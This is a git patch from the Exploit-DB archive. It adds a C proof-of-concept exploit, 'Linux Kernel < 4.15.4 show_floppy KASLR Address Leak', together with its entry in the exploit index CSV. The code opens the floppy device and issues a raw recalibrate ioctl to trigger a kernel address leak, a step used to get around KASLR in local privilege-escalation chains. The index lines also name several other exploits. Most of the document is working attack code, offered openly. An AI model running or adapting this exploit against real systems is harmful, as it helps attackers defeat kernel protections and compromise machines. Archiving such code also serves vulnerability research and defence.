From 31a39a07b9610c18f1d856ebde27acacf6af0f7d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 23 Mar 2018 05:01:51 +0000
Subject: [PATCH] DB: 2018-03-23

1 changes to exploits/shellcodes

Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak
---
 exploits/linux/local/44325.c | 40 ++++++++++++++++++++++++++++++++++++
 files_exploits.csv           |  1 +
 2 files changed, 41 insertions(+)
 create mode 100644 exploits/linux/local/44325.c

diff --git a/exploits/linux/local/44325.c b/exploits/linux/local/44325.c
new file mode 100644
index 000000000..829f4c1d9
--- /dev/null
+++ b/exploits/linux/local/44325.c
@@ -0,0 +1,40 @@
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <linux/kernel.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <linux/fd.h>
+
+static int drive_selector(int head) {
+            return (head << 2);
+}
+
+void fd_recalibrate(int fd) {
+                struct floppy_raw_cmd raw_cmd;
+                int tmp;
+
+                raw_cmd.flags = FD_RAW_INTR;
+                raw_cmd.cmd_count = 2;
+
+                // set up the command
+                raw_cmd.cmd[raw_cmd.cmd_count++] = 0x07; 
+                raw_cmd.cmd[raw_cmd.cmd_count++] = drive_selector(0); 
+                tmp = ioctl( fd, FDRAWCMD, &raw_cmd ); 
+                printf("Status:%d\n",tmp); 
+} 
+int main(){ 
+        printf("Start\n"); 
+        char *d; 
+        struct floppy_raw_cmd *cmd; 
+         
+        int fd; 
+        fd = open("/dev/fd0",O_RDWR | O_NDELAY); 
+        fd_recalibrate(fd); 
+        close(fd); 
+        printf("End\n"); 
+        return 0; 
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 50b1367f6..92871fae8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9609,6 +9609,7 @@ id,file,description,date,author,type,platform,port
 44313,exploits/windows_x86-64/local/44313.txt,"Microsoft Windows - Desktop Bridge VFS Privilege Escalation",2018-03-20,"Google Security Research",local,windows_x86-64,
 44314,exploits/windows/local/44314.ps1,"Microsoft Windows - Desktop Bridge Virtual Registry Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows,
 44315,exploits/windows/local/44315.txt,"Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows,
+44325,exploits/linux/local/44325.c,"Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak",2018-03-22,"Gregory Draperi",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139